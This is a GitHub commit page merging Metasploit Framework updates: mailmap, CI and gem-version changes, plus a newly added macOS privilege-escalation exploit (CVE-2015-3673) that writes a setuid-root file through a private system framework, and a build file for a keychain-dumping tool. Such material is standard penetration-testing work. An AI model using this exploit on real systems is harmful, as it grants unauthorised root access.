Skip to content

Commit 9746753

Browse files
author
Pedro Ribeiro
committed
Merge pull request #19 from rapid7/master
Abba
2 parents 70a2247 + 26c8380 commit 9746753

File tree

892 files changed

+119799
-87904
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

892 files changed

+119799
-87904
lines changed

.mailmap

Lines changed: 19 additions & 22 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,5 @@
11
bcook-r7 <bcook-r7@github> Brent Cook <[email protected]>
2+
bcook-r7 <bcook-r7@github> <[email protected]>
23
bturner-r7 <bturner-r7@github> Brandon Turner <[email protected]>
34
ccatalan-r7 <ccatalan-r7@github> Christian Catalan <[email protected]>
45
cdoughty-r7 <cdoughty-r7@github> Chris Doughty <[email protected]>
@@ -11,9 +12,8 @@ farias-r7 <farias-r7@github> Fernando Arias <[email protected]>
1112
hmoore-r7 <hmoore-r7@github> HD Moore <[email protected]>
1213
hmoore-r7 <hmoore-r7@github> HD Moore <[email protected]>
1314
jhart-r7 <jhart-r7@github> Jon Hart <[email protected]>
14-
jlee-r7 <jlee-r7@github> James Lee <[email protected]>
15-
jlee-r7 <jlee-r7@github> James Lee <[email protected]> # aka egypt
16-
jlee-r7 <jlee-r7@github> egypt <[email protected]> # aka egypt
15+
jlee-r7 <jlee-r7@github> <[email protected]>
16+
jlee-r7 <jlee-r7@github> <[email protected]> # aka egypt
1717
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <[email protected]>
1818
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <[email protected]>
1919
kgray-r7 <kgray-r7@github> Kyle Gray <[email protected]>
@@ -37,9 +37,8 @@ todb-r7 <todb-r7@github> Tod Beardsley <[email protected]>
3737
todb-r7 <todb-r7@github> Tod Beardsley <[email protected]>
3838
trosen-r7 <trosen-r7@github> Trevor Rosen <[email protected]>
3939
trosen-r7 <trosen-r7@github> Trevor Rosen <[email protected]>
40-
wchen-r7 <wchen-r7@github> Wei Chen <[email protected]>
41-
wchen-r7 <wchen-r7@github> sinn3r <[email protected]> # aka sinn3r
42-
wchen-r7 <wchen-r7@github> sinn3r <[email protected]>
40+
wchen-r7 <wchen-r7@github> <[email protected]> # aka sinn3r
41+
wchen-r7 <wchen-r7@github> <[email protected]>
4342
wvu-r7 <wvu-r7@github> William Vu <[email protected]>
4443
wvu-r7 <wvu-r7@github> William Vu <[email protected]>
4544
wvu-r7 <wvu-r7@github> William Vu <[email protected]>
@@ -73,18 +72,18 @@ efraintorres <efraintorres@github> efraintorres <[email protected]>
7372
efraintorres <efraintorres@github> et <>
7473
fab <fab@???> fab <> # fab at revhosts.net (Fabrice MOURRON)
7574
FireFart <FireFart@github> Christian Mehlmauer <[email protected]>
75+
FireFart <FireFart@github> <[email protected]>
7676
h0ng10 <h0ng10@github> h0ng10 <[email protected]>
7777
h0ng10 <h0ng10@github> Hans-Martin Münch <[email protected]>
78-
jcran <jcran@github> Jonathan Cran <[email protected]>
79-
jcran <jcran@github> Jonathan Cran <[email protected]>
80-
jduck <jduck@github> Joshua Drake <[email protected]>
78+
jcran <jcran@github> <[email protected]>
79+
jcran <jcran@github> <[email protected]>
80+
jcran <jcran@github> <[email protected]>
81+
jcran <jcran@github> <[email protected]>
82+
jduck <jduck@github> <[email protected]>
83+
jduck <jduck@github> <[email protected]>
8184
jgor <jgor@github> jgor <[email protected]>
82-
joevennix <joevennix@github> joe <[email protected]>
83-
joevennix <joevennix@github> Joe Vennix <[email protected]>
84-
joevennix <joevennix@github> Joe Vennix <[email protected]>
85-
joevennix <joevennix@github> joev <[email protected]>
86-
joevennix <joevennix@github> jvennix-r7 <[email protected]>
87-
joevennix <joevennix@github> jvennix-r7 <[email protected]>
85+
joevennix <joevennix@github> <[email protected]>
86+
joevennix <joevennix@github> <[email protected]>
8887
kernelsmith <kernelsmith@github> Joshua Smith <[email protected]>
8988
kernelsmith <kernelsmith@github> Joshua Smith <[email protected]>
9089
kernelsmith <kernelsmith@github> kernelsmith <kernelsmith@kernelsmith>
@@ -94,18 +93,17 @@ m-1-k-3 <m-1-k-3@github> m-1-k-3 <[email protected]>
9493
m-1-k-3 <m-1-k-3@github> m-1-k-3 <[email protected]>
9594
m-1-k-3 <m-1-k-3@github> m-1-k-3 <[email protected]>
9695
m-1-k-3 <m-1-k-3@github> Michael Messner <[email protected]>
97-
Meatballs1 <Meatballs1@github> Ben Campbell <[email protected]>
98-
Meatballs1 <Meatballs1@github> Meatballs <[email protected]>
99-
Meatballs1 <Meatballs1@github> Meatballs1 <[email protected]>
96+
Meatballs1 <Meatballs1@github> <[email protected]>
97+
Meatballs1 <Meatballs1@github> <[email protected]>
10098
mubix <mubix@github> Rob Fuller <[email protected]>
10199
nevdull77 <nevdull77@github> Patrik Karlsson <[email protected]>
102100
nmonkee <nmonkee@github> nmonkee <[email protected]>
103101
nullbind <nullbind@github> nullbind <[email protected]>
104102
nullbind <nullbind@github> Scott Sutherland <[email protected]>
105103
ohdae <ohdae@github> ohdae <[email protected]>
106-
oj <oj@github> OJ <[email protected]>
107-
oj <oj@github> OJ Reeves <[email protected]>
104+
oj <oj@github> <[email protected]>
108105
r3dy <r3dy@github> Royce Davis <[email protected]>
106+
r3dy <r3dy@github> Royce Davis <[email protected]>
109107
r3dy <r3dy@github> Royce Davis <[email protected]>
110108
Rick Flores <[email protected]> Rick Flores (nanotechz9l) <[email protected]>
111109
rsmudge <rsmudge@github> Raphael Mudge <[email protected]> # Aka `butane
@@ -116,8 +114,7 @@ skape <skape@???> Matt Miller <[email protected]>
116114
spoonm <spoonm@github> Spoon M <[email protected]>
117115
swtornio <swtornio@github> Steve Tornio <[email protected]>
118116
Tasos Laskos <[email protected]> Tasos Laskos <[email protected]>
119-
timwr <timwr@github> Tim <[email protected]>
120-
timwr <timwr@github> Tim Wright <[email protected]>
117+
timwr <timwr@github> <[email protected]>
121118
TomSellers <TomSellers@github> Tom Sellers <[email protected]>
122119
TrustedSec <[email protected]> trustedsec <[email protected]>
123120
zeroSteiner <zeroSteiner@github> Spencer McIntyre <[email protected]>

.travis.yml

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -41,3 +41,6 @@ branches:
4141

4242
addons:
4343
postgresql: '9.3'
44+
apt:
45+
packages:
46+
- libpcap-dev

Gemfile.lock

Lines changed: 21 additions & 17 deletions
Original file line numberDiff line numberDiff line change
@@ -1,33 +1,34 @@
11
PATH
22
remote: .
33
specs:
4-
metasploit-framework (4.11.3)
4+
metasploit-framework (4.11.4)
55
actionpack (>= 4.0.9, < 4.1.0)
66
activesupport (>= 4.0.9, < 4.1.0)
77
bcrypt
88
jsobfu (~> 0.2.0)
99
json
10+
metasm (~> 1.0.2)
1011
metasploit-concern (= 1.0.0)
1112
metasploit-model (= 1.0.0)
12-
metasploit-payloads (= 1.0.7)
13+
metasploit-payloads (= 1.0.15)
1314
msgpack
1415
nokogiri
15-
packetfu (= 1.1.9)
16+
packetfu (= 1.1.11)
1617
railties
1718
rb-readline-r7
1819
recog (= 2.0.6)
1920
robots
2021
rubyzip (~> 1.1)
2122
sqlite3
2223
tzinfo
23-
metasploit-framework-db (4.11.3)
24+
metasploit-framework-db (4.11.4)
2425
activerecord (>= 4.0.9, < 4.1.0)
25-
metasploit-credential (= 1.0.0)
26-
metasploit-framework (= 4.11.3)
26+
metasploit-credential (= 1.0.1)
27+
metasploit-framework (= 4.11.4)
2728
metasploit_data_models (= 1.2.5)
2829
pg (>= 0.11)
29-
metasploit-framework-pcap (4.11.3)
30-
metasploit-framework (= 4.11.3)
30+
metasploit-framework-pcap (4.11.4)
31+
metasploit-framework (= 4.11.4)
3132
network_interface (~> 0.0.1)
3233
pcaprub
3334

@@ -104,14 +105,15 @@ GEM
104105
i18n (0.7.0)
105106
jsobfu (0.2.1)
106107
rkelly-remix (= 0.0.6)
107-
json (1.8.2)
108+
json (1.8.3)
108109
mail (2.6.3)
109110
mime-types (>= 1.16, < 3)
111+
metasm (1.0.2)
110112
metasploit-concern (1.0.0)
111113
activerecord (>= 4.0.9, < 4.1.0)
112114
activesupport (>= 4.0.9, < 4.1.0)
113115
railties (>= 4.0.9, < 4.1.0)
114-
metasploit-credential (1.0.0)
116+
metasploit-credential (1.0.1)
115117
metasploit-concern (~> 1.0)
116118
metasploit-model (~> 1.0)
117119
metasploit_data_models (~> 1.0)
@@ -123,7 +125,7 @@ GEM
123125
activemodel (>= 4.0.9, < 4.1.0)
124126
activesupport (>= 4.0.9, < 4.1.0)
125127
railties (>= 4.0.9, < 4.1.0)
126-
metasploit-payloads (1.0.7)
128+
metasploit-payloads (1.0.15)
127129
metasploit_data_models (1.2.5)
128130
activerecord (>= 4.0.9, < 4.1.0)
129131
activesupport (>= 4.0.9, < 4.1.0)
@@ -135,18 +137,20 @@ GEM
135137
railties (>= 4.0.9, < 4.1.0)
136138
recog (~> 2.0)
137139
method_source (0.8.2)
138-
mime-types (2.4.3)
140+
mime-types (2.6.1)
139141
mini_portile (0.6.2)
140142
minitest (4.7.5)
141-
msgpack (0.6.0)
142-
multi_json (1.11.1)
143+
msgpack (0.6.2)
144+
multi_json (1.11.2)
143145
multi_test (0.1.2)
144146
network_interface (0.0.1)
145147
nokogiri (1.6.6.2)
146148
mini_portile (~> 0.6.0)
147-
packetfu (1.1.9)
149+
packetfu (1.1.11)
150+
network_interface (~> 0.0)
151+
pcaprub (~> 0.12)
148152
pcaprub (0.12.0)
149-
pg (0.18.2)
153+
pg (0.18.3)
150154
pg_array_parser (0.0.9)
151155
postgres_ext (2.4.1)
152156
activerecord (>= 4.0.0)
@@ -198,7 +202,7 @@ GEM
198202
rspec-core (~> 2.99.0)
199203
rspec-expectations (~> 2.99.0)
200204
rspec-mocks (~> 2.99.0)
201-
rubyntlm (0.5.0)
205+
rubyntlm (0.5.2)
202206
rubyzip (1.1.7)
203207
shoulda-matchers (2.8.0)
204208
activesupport (>= 3.0.0)
512 Bytes
Binary file not shown.
Binary file not shown.
9.07 KB
Binary file not shown.

data/exploits/CVE-2015-3673/exploit.m

Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
// gcc -bundle exploit.m -arch x86_64 -o exploit.daplug -framework Cocoa
2+
3+
#include <dlfcn.h>
4+
#include <objc/objc.h>
5+
#include <objc/runtime.h>
6+
#include <objc/message.h>
7+
#include <Foundation/Foundation.h>
8+
9+
#define PRIV_FWK_BASE "/System/Library/PrivateFrameworks"
10+
#define FWK_BASE "/System/Library/Frameworks"
11+
12+
void __attribute__ ((constructor)) test(void)
13+
{
14+
void* p = dlopen(PRIV_FWK_BASE "/SystemAdministration.framework/SystemAdministration", RTLD_NOW);
15+
16+
if (p != NULL)
17+
{
18+
id sharedClient = objc_msgSend(objc_lookUpClass("WriteConfigClient"), @selector(sharedClient));
19+
objc_msgSend(sharedClient, @selector(authenticateUsingAuthorizationSync:), nil);
20+
id tool = objc_msgSend(sharedClient, @selector(remoteProxy));
21+
22+
NSString* inpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_IN"];
23+
NSString* outpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_OUT"];
24+
NSData* data = [NSData dataWithContentsOfFile:inpath];
25+
26+
objc_msgSend(tool, @selector(createFileWithContents:path:attributes:),
27+
data,
28+
outpath,
29+
@{ NSFilePosixPermissions : @04777 });
30+
}
31+
32+
exit(1);
33+
}
Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
all:
2+
gcc dump.m -framework CoreFoundation -framework Security -framework Cocoa -o dump

data/exploits/osx/dump_keychain/dump

19.2 KB
Binary file not shown.

0 commit comments

Comments
 (0)